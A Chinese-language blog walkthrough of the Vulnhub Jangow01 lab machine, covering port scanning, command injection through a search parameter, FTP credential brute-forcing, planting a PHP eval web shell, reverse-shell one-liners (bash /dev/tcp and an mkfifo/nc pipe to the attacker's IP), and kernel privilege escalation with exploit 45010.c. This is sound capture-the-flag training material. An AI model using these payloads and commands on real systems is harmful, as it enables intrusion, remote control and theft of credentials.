【靶场练习】Vulnhub靶场Jangow01-练习记录

Vulnhub靶场Jangow01-练习记录

信息收集

目标机IP:192.168.43.163
攻击机IP:192.168.43.118

端口扫描:nmap -sC -sV 192.168.43.163
在这里插入图片描述
开放21,80两个端口,通过浏览器访问80端口:
在这里插入图片描述
点site后,进入了一个正常的页面
在这里插入图片描述
点击页面上的标签,直到点击右上角Buscar的时候,页面跳转到http://192.168.43.163/site/busque.php?buscar=
buscar作为一个变量,尝试命令传递
http://192.168.43.163/site/busque.php?buscar=ls,有返回信息
在这里插入图片描述
发现有一个wordpress文件夹,查看一下里面的文件信息:
?buscar=ls wordpress,里面有config.php和index.html文件
查看config.php里面的内容:
在这里插入图片描述
得到账号:desafio02,密码:abygurl69
尝试登录系统失败

?buscar=cat /etc/passwd 查看密码信息:
在这里插入图片描述
得到jangow01 desafio02,尝试登录也失败。

将jangow01,desafio02,abygurl69写成一个字典,用nmap尝试爆破:
nmap --script ftp-brute --script-args userdb=user.txt,passdb=user.txt -v 192.168.43.163
爆破成功得到账号:jangow01 密码:abygurl69
可以登陆系统和ftp
uname -a 查看系统版本信息: ubuntu 4.4.0-31

?buscar=cat /home/jangow01/user.txt时,得到一串md5加密的字符串:
d41d8cd98f00b204e9800998ecf8427e
尝试在线md5解密: [空密码]/[Empty String]

尝试通过网页写入后门:
?buscar=echo ‘<?php eval($_POST['xx']);?>’ > 1.php
写完之后成功通过菜刀连接,查看文件,在html文件夹下有.backup文件,里面记录正确的账号密码
在这里插入图片描述

反弹shell

直接bash -i >& /dev/tcp/192.168.43.118/1234 0>&1时,发现系统转换了很多字符
通过菜刀在site文件夹中创建一个shl.php文件,写入如下内容:

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.118 443 > /tmp/f');?>

然后浏览器访问http://192.168.43.163/site/shl.php,反弹成功

提权操作

searchsploit ubuntu 4.4.0
发现可用文件45010.c
通过ftp或者菜刀上传到服务器
gcc 45010.c -o exp //生成可执行文件
chmod +x exp //添加exp的执行权限
./exp //执行exp文件
在这里插入图片描述

成功提权,cd /root进入root文件,有proof.txt
cat proof.txt 成功拿到flag
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小白帽的成长

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值